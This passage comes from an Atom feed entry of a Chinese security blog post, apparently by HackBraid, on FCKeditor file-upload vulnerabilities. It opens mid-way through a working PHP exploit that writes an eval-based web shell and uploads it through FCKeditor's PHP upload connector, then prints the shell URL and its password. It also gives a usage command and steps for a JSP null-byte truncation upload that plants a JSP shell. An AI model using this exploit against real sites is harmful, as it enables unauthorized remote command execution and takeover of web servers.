Example:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                  php &#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$argv&lt;/span&gt;[&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;].&lt;span class=&quot;string&quot;&gt;&#39; localhost&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      +--------------------------------------------------------------+&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      &#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      &lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$host&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$argv&lt;/span&gt;[&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$file&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;index.php&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$path&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;/admin/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$url&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;https://&#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$host&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$path&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$fp&lt;/span&gt; = fopen(&lt;span class=&quot;string&quot;&gt;&quot;$file&quot;&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&quot;w&quot;&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;die&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;can not write&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;fwrite(&lt;span class=&quot;variable&quot;&gt;$fp&lt;/span&gt;,&lt;span class=&quot;string&quot;&gt;&quot;&amp;lt;?php phpinfo();eval(\$_POST[cmd]);?&amp;gt;&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;fclose(&lt;span class=&quot;variable&quot;&gt;$fp&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$data&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;NewFile&#39;&lt;/span&gt;=&amp;gt;&lt;span class=&quot;string&quot;&gt;&#39;@&#39;&lt;/span&gt;. dirname(&lt;span class=&quot;keyword&quot;&gt;__FILE__&lt;/span&gt;).&lt;span class=&quot;string&quot;&gt;&quot;/$file&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt; = curl_init(); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_URL, &lt;span class=&quot;variable&quot;&gt;$url&lt;/span&gt; ); &lt;span class=&quot;comment&quot;&gt;// &lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_SSL_VERIFYPEER, &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_SSL_VERIFYHOST, &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_USERAGENT, &lt;span class=&quot;string&quot;&gt;&quot;Mozilla/4.0&quot;&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;@curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_FOLLOWLOCATION, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_AUTOREFERER, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_POST, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_POSTFIELDS, &lt;span class=&quot;variable&quot;&gt;$data&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_TIMEOUT, &lt;span class=&quot;number&quot;&gt;120&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_HEADER, &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_setopt ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt;, CURLOPT_RETURNTRANSFER, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt; );&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$tmpInfo&lt;/span&gt; = curl_exec ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt; ); &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (curl_errno ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt; )) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;Errno&#39;&lt;/span&gt; . curl_error ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt; );&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;curl_close ( &lt;span class=&quot;variable&quot;&gt;$curl&lt;/span&gt; );&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//echo $tmpInfo;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    preg_match(&lt;span class=&quot;string&quot;&gt;&#39;/201,\&quot;(.*)\&quot;,\&quot;/iU&#39;&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$tmpInfo&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$matchs&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$url&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;https://&#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$host&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$matchs&lt;/span&gt;[&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;Shell: &#39;&lt;/span&gt;.&lt;span class=&quot;variable&quot;&gt;$url&lt;/span&gt;.&lt;span class=&quot;string&quot;&gt;&#39;   password: cmd&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;2.利用方式：php.exe 1.php 202.ip.ip.ip&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f3.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;【JSP+2-2】&quot;&gt;【JSP+2.2】&lt;/h3&gt;&lt;p&gt;1.利用00截断上传，地址如下：&lt;br&gt;&lt;a href=&quot;http://***/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;amp;Connector=connectors/jsp/connector&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://***/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;amp;Connector=connectors/jsp/connector&lt;/a&gt;&lt;br&gt;2.上传后抓包并添加00截断如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f4.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;3.shell地址：&lt;a href=&quot;http://***/UserFiles/Image/x.jsp&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://***/UserFiles/Image/x.jsp&lt;/a&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f5.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2015/07/09/fckeditor/&quot;&gt;http://www.cnbraid.com/2015/07/09/fckeditor/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_FCKeditor简介&quot;&gt;0x01 FCKeditor简介&lt;/h2&gt;&lt;p&gt;FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化，不需要太复杂的安装步骤即可使用。它可和PHP、 JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合。“FCKeditor”名称中的 “FCK” 是这个编辑器的作者的名字Frederico Caldeira Knabben的缩写。FCKeditor 相容于绝大部分的网页浏览器，像是 : Internet Explorer 5.5+ (Windows)、Mozilla Firefox 1.0+、Mozilla 1.3+ 和 Netscape 7+。在未来的版本也将会加入对 Opera 的支援。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="fckeditor" scheme="http://www.cnbraid.com/tags/fckeditor/"/>
    
      <category term="插件" scheme="http://www.cnbraid.com/tags/%E6%8F%92%E4%BB%B6/"/>
    
  </entry>
  
</feed>